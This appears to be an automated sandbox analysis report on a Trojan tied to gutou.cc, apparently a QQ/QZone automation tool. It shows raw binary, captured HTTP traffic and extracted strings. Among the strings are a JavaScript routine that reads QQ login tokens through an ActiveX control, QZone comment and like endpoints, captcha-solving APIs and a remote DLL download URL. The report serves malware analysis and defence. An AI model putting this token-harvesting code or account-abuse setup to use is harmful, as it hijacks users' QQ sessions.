...].*........0.e.AT..@9.....t.h..:.....nt..]..!9Y._..8..K[.P.v.....f.
.t.S.RX.%......<.E...Ph8i...].W..lwh.h5=#/i2..,.K39....y.K}.&...MHu
.b......t...A......t;.u.......~.....3.....p.m....t..A.L&..t."..p......
t....A. .........po.@... ..<$Q.^.o?..d.u......Q8.*Y.*.....?...Iu..u
.{L..X..$W.U....V....2.....H<...X.....L..}.f.E....f .m..}...m&m.$..
U.......o...f...It..........|.g48...........k........VMProtect begin..
.P1P.X0.....V..AQS.....z..a..7X....j.u.....<..@.H.F.l...Z.N....

<<< skipped >>>

GET /up/tongji.htm HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.gutou.cc

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:36 GMT

Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17

Last-Modified: Sat, 04 Jul 2015 23:52:47 GMT

ETag: "3b8-51a155e94d1c0"

Accept-Ranges: bytes

Content-Length: 952

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv
="Content-Type" content="text/html; charset=gb2312" />.<title>
;tongji</title>.</head>.<script type="text/javascript"&
gt;var cnzz_protocol = (("https:" == document.location.protocol) ? " h
ttps://" : " hXXp://");document.write(unescape(""));</script>..<script language="javascript
" type="text/javascript" src="hXXp://js.users.51.la/17287617.js">&l
t;/script>.<noscript><a href="hXXp://VVV.51.la/?17287617" 
target="_blank"><img alt="我要啦免࣓
9;统计" src="hXXp://img.users.51.la/17287617.asp" style="b
order:none" /></a></noscript>.<body>.</body>
;.</html>.HTTP/1.1 200 OK..Date: Mon, 06 Nov 2017 02:43:36 GMT..
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17..Last-Modifie
d: Sat, 04 Jul 2015 23:52:47 GMT..ETag: "3b8-51a155e94d1c0"..Accept-Ra
nges: bytes..Content-Length: 952..Keep-Alive: timeout=5, max=100..Conn
ection: Keep-Alive..Content-Type: text/html..<!DOCTYPE html PUBLIC 
"-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/
DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org<<< skipped >>>

GET /core.php?web_id=1252975436&show=pic&t=z HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 765

Connection: keep-alive

Date: Mon, 06 Nov 2017 02:39:47 GMT

Last-Modified: Mon, 06 Nov 2017 02:39:47 GMT

Expires: Mon, 06 Nov 2017 02:54:47 GMT

Via: cache19.l2et15[0,200-0,H], cache6.l2et15[0,0], kunlun4.cn250[0,200-0,H], kunlun2.cn250[0,0]

Age: 233

X-Cache: HIT TCP_MEM_HIT dirn:-2:-2 mlen:-1

X-Swift-SaveTime: Mon, 06 Nov 2017 02:41:04 GMT

X-Swift-CacheTime: 823

Timing-Allow-Origin: *

EagleId: 7ae44a8915099362207752615e
!function(){var p,q,r,a=encodeURIComponent,b="1252975436",c="pic",d=""
,e="online_v3.php",f="z5.cnzz.com",g="1",h="pic",i="z",j="站&
271;统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:"
,m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("
h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m
&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["
createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/webs
ite.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.c
nzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j 
"'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p
="<a href='" q "' target=_blank title='" j "'>" j "</a>",k
["createIcon"]([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Typ
e: application/javascript..Content-Length: 765..Connection: keep-alive
..Date: Mon, 06 Nov 2017 02:39:47 GMT..Last-Modified: Mon, 06 Nov 2017
 02:39:47 GMT..Expires: Mon, 06 Nov 2017 02:54:47 GMT..Via: cache19.l2
et15[0,200-0,H], cache6.l2et15[0,0], kunlun4.cn250[0,200-0,H], kunlun2
.cn250[0,0]..Age: 233..X-Cache: HIT TCP_MEM_HIT dirn:-2:-2 mlen:-1..X-
Swift-SaveTime: Mon, 06 Nov 2017 02:41:04 GMT..X-Swift-CacheTime: 823.
.Timing-Allow-Origin: *..EagleId: 7ae44a8915099362207752615e..!functio
n(){var p,q,r,a=encodeURIComponent,b="1252975436",c="pic",d="",e="onli
ne_v3.php",f="z5.cnzz.com",g="1",h="pic",i="z",j="站长 
479;计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="<<< skipped >>>

GET /stat.php?id=1252975436&show=pic HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: s23.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10990

Connection: keep-alive

Date: Mon, 06 Nov 2017 01:30:33 GMT

Last-Modified: Mon, 06 Nov 2017 01:30:33 GMT

Cache-Control: max-age=5400,s-maxage=5400

Via: cache2.l2et15[0,200-0,H], cache13.l2et15[0,0], kunlun5.cn133[0,200-0,H], kunlun8.cn133[5,0]

Age: 4386

X-Cache: HIT TCP_MEM_HIT dirn:10:822723752 mlen:-1

X-Swift-SaveTime: Mon, 06 Nov 2017 01:42:55 GMT

X-Swift-CacheTime: 4658

Timing-Allow-Origin: *

EagleId: ab6f9ac815099362193695898e
(function(){function k(){this.c="1252975436";this.ca="z";this.Z="pic";
this.W="";this.Y="";this.C="1509931833";this.aa="z5.cnzz.com";this.X="
";this.G="CNZZDATA" this.c;this.F="_CNZZDbridge_" this.c;this.P="_cnzz
_CV" this.c;this.R="CZ_UUID" this.c;this.L="UM_distinctid";this.H="0";
this.K={};this.a={};this.Aa()}function g(a,.b){try{var c=[];c.push("si
teid=1252975436");c.push("name=" f(a.name));c.push("msg=" f(a.message)
);c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push
("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" M
ath.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnz
z.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encod
eURIComponent,m=decodeURIComponent,r=unescape;k.prototype={Aa:function
(){try{this.ja(),this.V(),this.wa(),this.T(),this.za(),.this.w(),this.
ua(),this.ta(),this.xa(),this.o(),this.sa(),this.va(),this.ya(),this.q
a(),this.oa(),this.ra(),this.Ea(),e[this.F]=e[this.F]||{},this.pa("_cn
zz_CV")}catch(a){g(a,"i failed")}},Ca:function(){try{var a=this;e._czc
={push:function(){return a.M.apply(a,arguments)}}}catch(b){g(b,"oP fai
led")}},oa:function(){try{var a=e._czc;if("[object Array]"==={}.toStri
ng.call(a))for(var b=0;b<a.length;b  ){var c=a[b];switch(c[0]){case
 "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1]
)?.c[1]:String(c[1]);break;case "_setAutoPageview":"boolean"===typeof 
c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},Ea:funct
ion(){try{if("undefined"===typeof e._cz_account||e._cz_account===t<<< skipped >>>

GET /go.asp?svid=11&id=17287617&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://VVV.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&vvtime=1509936221385 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: web.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:17 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 0

Content-Type: text/html

Expires: Sun, 05 Nov 2017 10:03:17 GMT

Cache-control: private

HTTP/1.1 200 OK..Date: Mon, 06 Nov 2017 02:43:17 GMT..Server: Microsof
t-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 0..Content-Type: tex
t/html..Expires: Sun, 05 Nov 2017 10:03:17 GMT..Cache-control: private
..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3796:

`.rsrc

t%SVh

t$(SSh

~%UVW

}?9\$0~9

u$SShe

kku2.iu

/wK(.wS

kernel32.dll

advapi32.dll

wininet.dll

oleaut32.dll

Kernel32.dll

atl.dll

ole32.dll

shlwapi.dll

user32.dll

data\lz.dll

data\uu.dll

data\dc.dll

dbghelp.dll

ntdll.dll

gdiplus.dll

GdiPlus.dll

Ole32.dll

GetProcessHeap

RegOpenKeyA

RegEnumKeyA

RegCloseKey

RegOpenKeyExA

MsgWaitForMultipleObjects

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

uu_loginA

ReportError

uu_reportError

SetWindowsHookExA

UnhookWindowsHookEx

EnumWindows

GdiplusShutdown

CreateIoCompletionPort

{B6F7542F-B8FE-46a8-9605-98856A687097}

42305932-06E6-47a5-AC79-8BDCDC58DF61

HttpClient

1970-1-1 00:00:01

001A2B3C4D5Ec:\kss.ini

SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\

ServiceName\\.\

2u.eKITFBp

hXXp://y.gutousoft.com/sale.php#tag41

(*.bmp;*.dib;*.jpg;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png)|*.bmp;*.dib;*.jpg;*.jpeg;*.jpe;*.jfif;*.gif;*.tif;*.tiff;*.png|GIF

(*.gif;*.tif;*.tiff)|*.gif;*.tif;*.tiff|PNG

(*.png)|*.png|JPG

(*.jpg;*.jpeg;*.jpe;*.jfif)|*.jpeg;*.jpe;*.jfif|BMP

(*.bmp;*.dib)|*.bmp;*.dib|

(*.*)|*.*

12.5.3

hXXp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/ç§’è¯„ç§’èµž.txt

hXXp://

sale.php?

sale.php#

hXXp://vip.gutou.cc

vip.gutou.cc

hXXps://

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

@https

hXXp://y.gutousoft.com

y.gutousoft.com

\data\error.ini

hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=

&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.

nickname

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=

clientkey=

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

pgv_pvi=; pgv_si=; _qpsvr_localtk=; pgv_pvid=; pgv_info=ssid=; pt2gguin=; uin=; skey=; ptisp=; RK=; ptcz=; p_uin=; p_skey=; pt4_token=; Loading=; QZ_FE_WEBP_SUPPORT=; cpu_performance_v8=

hXXp://user.qzone.qq.com/

hXXp://user.qzone.qq.com/88882222

.substr(

hXXp://qzone.qq.com/

location = 'url'

hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msgdetail_v6?uin=

hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_delcomment_ugc?g_tk=

qzreferrer=http://user.qzone.qq.com/

hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/cgi_get_feeds_count.cgi?uin=

,nick:'

login

skey=

p_skey=

; skey=

hXXps://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=

msglist

&scope=0&view=1&daylist=&uinlist=&gid=&flag=1&filter=all&applist=all&refresh=0&aisortEndTime=0&aisortOffset=0&getAisort=0&aisortBeginTime=0&pagenum=1&externparam=&firstGetGroup=0&icServerTime=0&mixnocache=0&scene=0&begintime=0&count=10&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.

hXXps://h5.qzone.qq.com/proxy/domain/ic2.qzone.qq.com/cgi-bin/feeds/feeds3_html_more?uin=

nickname:'

data-curkey=\x22

data-unikey=\x22

key:'

hXXp://user.qzone.qq.com/

&curkey=

&unikey=

hXXp://h5.qzone.qq.com/proxy/domain/w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=

p_skey

hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA5NDc0MF80MzUxMjhfODAwMDk0NzQwXzJf

\data\yzm.jpg

hXXp://m.gutousoft.com/yzm/getsoft.php

\data\lz.dll

.text

`.rdata

@.data

.rsrc

@.reloc

NETAPI32.dll

MFC42.DLL

MSVCRT.dll

KERNEL32.dll

USER32.dll

SHLWAPI.dll

WININET.dll

FastVerCode.dll

.PAVCObject@@

.PAVCException@@

.PAVCFileException@@

.PAVCInternetException@@

Content-Disposition: form-data; name="key"

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN)

POST /api.php?mod=yzm&act=state HTTP/1.1

/api.php?mod=yzm&act=state

LZConfig.ini

User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)

HTTP/1.1

/api.php?mod=yzm&act=add

POST /api.php?mod=yzm&act=result HTTP/1.1

/api.php?mod=yzm&act=result

POST /api.php?mod=yzm&act=point HTTP/1.1

/api.php?mod=yzm&act=point

POST /api.php?mod=yzm&act=register HTTP/1.1

/api.php?mod=yzm&act=register

dama3.hyslt.com

POST /api.php?mod=dmuser&act=yzm_error HTTP/1.1

/api.php?mod=dmuser&act=yzm_error

.hyslt.com

XXXXXX

hXXp://ip.qq.com/

POST /api.php?mod=yzm&act=server HTTP/1.1

/api.php?mod=yzm&act=server

7r7S7

9D62354B-2079-4449-A366-31997628A532

\data\uu.dll

SSSSh

ByScreen.JPG

operator

GetProcessWindowStation

E:\work\UUWiseHelper

\UUWiseHelper.pdb

GDI32.dll

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

urlmon.dll

IPHLPAPI.DLL

WS2_32.dll

GetCPInfo

UUWiseHelper.DLL

uu_easyRecognizeUrlA

uu_easyRecognizeUrlW

uu_loginW

uu_recognizeByCodeTypeAndUrlA

uu_recognizeByCodeTypeAndUrlW

zcÁ

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

"0,01070

88J8R8x8

0#0'0-01070;0

=*>0>4>8><>

5%6S6

3$3,383\3|3

hXXp://api.ruokuai.com/register.xml

hXXp://api.ruokuai.com/info.xml

hXXp://api.ruokuai.com/recharge.xml

hXXp://api.ruokuai.com/create.xml

hXXp://api.ruokuai.com/reporterror.xml

\data\dc.dll

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

WSOCK32.dll

MSVCP60.dll

dc.dll

ReportError_A

VBYB_ReportError

VB_ReportError

debug.ini

ReportError:%s

Error:%s

%s|!|%s

\dms.pdb

%u%u,

dclog.txt

port

settimeout:%d

[%d]%s

reg2:%s

checkok:%s %s

check fail:%s %s %s

check:%s %s

getcjfail:%s %s

getcj:%s %s

%s%uout

%s%uin

put img ok:%s

put img fail:%s

put img:%s %s %d

get result ok:%s,%s

get result fail:%s

get result:%s

notifyfail ok:%s

notifyfail fail:%s,%s

notifyfail:%s

getimgok:%s,%s

getimg:%s

getinfo fail:%s

getinfo:%s,%s

setresult:%s,%s

HTTP/1.1 200 OK

recv:%d

send:%d

GET /ip.txt HTTP/1.1

Host: %s

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2

select:%d

ioctlsocket:%d

socket:%d

api.qqchaoren.net

14.17.65.24

14.17.65.23

dama2.qqchaoren.net

dama1.qqchaoren.net

connect total:%s %d

:%s %d

connect discard:%s %d

[d-d-d d:d:d](u)

recv timeout:<%d>

recvfail:<%d>%d

server close:<%d>%d

recv:<%d>%d

send:<%d>%d

sendfail:<%d>%d

connect timeout:<%d>

connectok:<%d>%s %hu

127.0.0.1

1.1.3

1'1,1<1]2

9 9$9(9,9094989<9

hXXp://m.gutousoft.com/yzm/reportosft.php?card=&id=

hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=

hXXp://h5.qzone.qq.com/proxy/domain/b1.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=

/infocenter?ptsig=&topicId=

hXXp://h5.qzone.qq.com/proxy/domain/photo.qq.com/cgi-bin/common/cgi_add_piccomment_v2?g_tk=

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?g_tk=

/main&topicId=

/myhome

&richtype=1&private=0¶mstr=1&qzreferrer=http://user.qzone.qq.com/

,nick:}

; p_skey=

Content-Disposition: form-data; name="skey"

skey

1.jpg

Content-Disposition: form-data; name="filename"; filename="1.jpg"

Content-Disposition: form-data; name="zzpanelkey"

Content-Disposition: form-data; name="p_skey"

Content-Disposition: form-data; name="backUrls"

hXXp://upbak.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image,hXXp://119.147.64.75/cgi-bin/upload/cgi_upload_image

Host: shup.photo.qzone.qq.com

hXXp://shup.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image?g_tk=

</url>

<url>

&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.

hXXp://r.qzone.qq.com/cgi-bin/tfriend/getfriendmsglist.cgi?uin=

&msgTime=

&flag=100&key=

1970-01-01 08:00:00

\data\setsoft.ini

\update.exe

MSXML2.XMLHTTP

Microsoft.XMLHTTP

Can't create XMLHTTP connection object

Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)

application/x-www-form-urlencoded

errmsg_s

Comet.WndShadow

Comet.WndShadow.Color

Comet.WndShadow.Size

Comet.WndShadow.Proc

SysShadow

*.txt

skey=@[A-Za-z0-9]{3,};

skey=@[A-Za-z0-9]{3,};

(*.txt)|*.txt|

hXXp://VVV.gutou.cc/up/tongji.htm#

Bugreport

VBScript.RegExp

:|:czkey:|:

update.temp

b@.bak

password

x.yvr

x.yvkd

C:\Windows\

C:\Windows\bd.d

hXXp://m.gutousoft.com/yzm/bd.dll

1,2,5,6,7,8,11,12,21,51

\.pL.

Windows

0,8999($

.SCK_LINES/9

.jJ^\

.ERZDLL$

%fLH^A

n.ef"

g%s_%d

=.Xh"

.Hjsp"

ANSI_CHARSE.Dc

O7E(AL("%s

KeywnF

.cu%t

\-ú

.NDFR8P

 Ix.Lv?h]#

keysK<

A.DHq*-

8X%Fx

L.@%u

.QunW

.da]o

.PP`

.pas8

6.Pob

oOV?.DD@

.ChS-v

#yfP.re

KERNEL32.DLL

comctl32.dll

gdi32.dll

version.dll

wsock32.dll

rsadll.dll

\data\Gutou.ini

gutousoft.com

gutou.cc

A1yWwtUixtgj9gnDMUUISlY0Elm8fH2Xgwng3ro8MHs4og5BmZdt1cHkSAPX8sFDiVmkLp1Ycv1jfxGNX2yKK3sDQUaNBKmRPOwh3ngD6czrytZsBRY6yejy6Wmb8OUYbflN lZmF02OBWfFnDhtvlgfXgOfZXzu0yjgCZzjBdK0IOdNU5VBmnEg9b1puMo0Rt/rGCRZAsdYymSpqPVD8WFsUWPySk2AefWYtQ3NFju tAYVIWIqmtpwScK5hOfXSXiCk0jthyk/1MHMmBqRZm4NUoVSP29U8NURhC9qmD9GYB/o9Vn9BSenpsyHXDDAcX72zEbn2RDQqD0l4gabn/pPllB7nDOXRfnMAxHmUUYxvHCtPIYLDRRg25YDjAsMZqCOLQS tZU/ vw65PgpPiPHC A9KqsCCVrYwwFcjhEMc9bP25esSGERNX5v8WlsREOrfY9/saOV3g8mUQ/FMzqokUtFQ3mGSPlOWmbCx66iB/zl7GJC0v1sduP0m6z1kv2clHSrkD5N0z VnTfhcf565o D0anX1RaJFcpMFvZTxyhupBG8GfYyCjfaARXZUgNV97faSX63T 1RcxTKUJ78hc9Wpr54Ud4y6svK9/jk5DUTcMULHO4yUNI aneNgGrXRK/i4fidArJqtkc5mYNTJCBAXrKERMojnFwpliUq9C6s6 LPIwB/5Yns/E0cpFp4Ep0/CZ lmiO5vdS1soFKXTVieYESplJ 9p28UWbOew9U6ZLTxNijwA3W7SHuT/5rekE5m3atcpLbpZff6ZMylNsdzyx8TF16vo VLXGdCX/3577uo8kdeHLHwBFLVoOh7SqxZFMDr5lkW/3XiTiL3TNmpZ4Vh1nhMqQEek8YMGcGStfN0mI23abFInwLmjV6N/PLM19Zprpi4nVM22X47VlGUeVNjk jKcNsBLSnGkdVtv55YEvNVMtDRYEqvZ1GLY0CTnzWThMxz6nJfJBLmLraBTgj1wpLiW5FU2rlf2LCuI4tB0/N1iNreMvHXgYhDZtZ2p2wpo tFDgx5ZyHsFSnSWh99Bt99gAWe0TCosnqlPSERGT4bXhhlzYzgZ18w5voJ8NM6kZnFTJ8zcnpVWcPpw2PnSuzoNElUq4C hLmj7r Tl fOL8OIPr/z0KpySnOT2U1OxvnZnc7hP2CWMrNfFt8r9bpZlf0RkFtT4sG1/7zJRC6El6m9KrHPtQtn8v8ESuQZ8t04rYsgKNWsHJD7vXF8z8iT4WcuCEhYCwn SPh487i6XS0USOWDZBVk6FVPQYv9 kEK98L8cV90Ty UYCVw8wCe54y5OmzOoz7Pl/Ea9Z7f7FN7Ke3EobpW5c20PdYstl7XEufeEwwripsre6FiYKRFlElw onXZay/mfYawx32N/F0keF046qkNip3vfg/tSg2P2CFcsWWkzrqResw3aOw MP 2yE3WnkcknIWk7Qo6TLhByvq/LJ6UF8iv7Z4TMynvu2rYK5FG1uJw7qqXPeoISPFT7a6UPhnJM3rPDTvk/utz2vAtgwGXXoqysDIGa 1i4fwRo0QLN46ovlyzciWOq9GndGZuPi8DN30xEN2En/J rAlf2QADqPJZP1m/LgjYVA7Ekqhru wtbYYspEaIigvx7nNDdm6ZqXIw4NBlZvPW1XHW7/t7jyyebT7aecpBWF F60PCPinI9yfhe6HIQAjBI=

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

COMCTL32.dll

MSIMG32.dll

MSVFW32.dll

SkinH_EL.dll

X@.gif

hXXp://ctc.qzonestyle.gtimg.cn/qzone/em/e

M@hXXp://ctc.qzonestyle.gtimg.cn/aoi/img/shuoshuo/emo/e10000

.AVVV.gutou.cc/?dengluqi

hXXp://VVV.gutou.cc

@@hXXp://gutou.cc

anonymous@123.com

.exe|.rar|.zip|.gif|.jpg|.mp3|.rm

hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&pt_qr_app=

&pt_qr_link=http://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=0

pt_login_sig=

login_sig:"

&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&r=0.

&appid=549000912&js_ver=10217&js_type=1&login_sig=

hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=

hXXps://ssl.captcha.qq.com/cap_union_new_gettype?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=

hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

websig:"

websig

hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=

&fpinfo=fpsig=10003984BBD51C3B52FD927E254E90E605658E8D6BF1CC645111B23EAF66D6F2F09DD5EEB20495B6A3053095B909E270B0A2&tlg=1&vlg=0_0_0&vmtime=_&vmData=

&websig=

aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

Referer: hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

&js_ver=10216&js_type=1&login_sig=

&pt_randsalt=2&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=1-

hXXps://ssl.ptlogin2.qq.com/login?u=

aq.qq.com/cn2/unionverify/

if (ans == w.toLowerCase()) {

for (j = 0; j <= 3; j  ) str  = hex_chr.charAt((num >> (j * 8   4)) & 0x0F)   hex_chr.charAt((num >> (j * 8)) & 0x0F);

nblk = ((str.length   8) >> 6)   1;

for (i = 0; i < str.length; i  ) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);

blks[nblk * 16 - 2] = str.length * 8;

for (i = 0; i < x.length; i  = 16) {

$.RSA = $pt.RSA = function() {

if (e < t.length   11) return uv_alert("Message too long for RSA"),

n = t.length - 1; n >= 0 && e > 0;) {

var o = t.charCodeAt(n--);

for (s[0] = 0; 0 == s[0];) p.nextBytes(s);

this.dmp1 = null,

this.dmq1 = null,

this.coeff = null

null != e && null != i && e.length > 0 && i.length > 0 ? (this.n = t(e, 16), this.e = parseInt(i, 16)) : uv_alert("Invalid RSA public key")

return t.modPowInt(this.e, this.n)

var i = e(t, this.n.bitLength()   7 >> 3);

var n = this.doPublic(i);

var o = n.toString(16);

return 0 == (1 & o.length) ? o: "0"   o

null != t && ("number" == typeof t ? this.fromNumber(t, e, i) : null == e && "string" != typeof t ? this.fromString(t, 256) : this.fromString(t, e))

o = Math.floor(r / 67108864),

return ut.charAt(t)

var i = gt[t.charCodeAt(e)];

return e.fromInt(t),

if (4 != e) return void this.fromRadix(t, e);

for (var n = t.length,

